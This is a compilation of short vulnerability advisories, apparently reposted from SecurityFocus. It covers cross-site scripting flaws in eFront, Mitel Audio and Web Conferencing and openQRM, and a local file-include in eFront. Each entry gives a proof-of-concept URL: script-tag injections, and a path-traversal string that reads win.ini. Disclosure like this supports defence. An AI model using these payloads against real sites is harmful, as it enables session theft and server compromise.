An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

eFront 3.6.9 build 10653 is vulnerable; other versions may also be affected. 

http://www.example.com/efront/www/modules/module_crossword/app/submitScore.php?seq=<script>alert(0)</script>&cookie=<script>alert(0)</script>
HireHackking 
source: https://www.securityfocus.com/bid/47874/info

Mitel Audio and Web Conferencing is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Audio and Web Conferencing 4.4.3.0 is vulnerable; other versions may also be affected.

https://www.example.com/wd/wdinvite.asp?SID=&#039;><script>alert(1)</script>

https://www.example.com/wd/connect.asp?mode=joinmeeting&uid=&#039;><script>alert(1)</script>&sid=&#039;><script>alert(1)</script>

https://www.example.com/wd/applets/Error.asp?type=</span><script>alert(1)</script>
HireHackking 
source: https://www.securityfocus.com/bid/47870/info

eFront is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

eFront 3.6.9 build 10653 is vulnerable; other versions may also be affected. 

http://www.example.com/efront/www/js/scripts.php?load=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
HireHackking 
source: https://www.securityfocus.com/bid/47865/info

openQRM is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

openQRM 4.8 is vulnerable; other versions may also be affected. 

http://www.example.com/openqrm-4.8/src/plugins/zfs-storage/web/zfs-storage-action.php?source_tab="<script>alert(0)</script>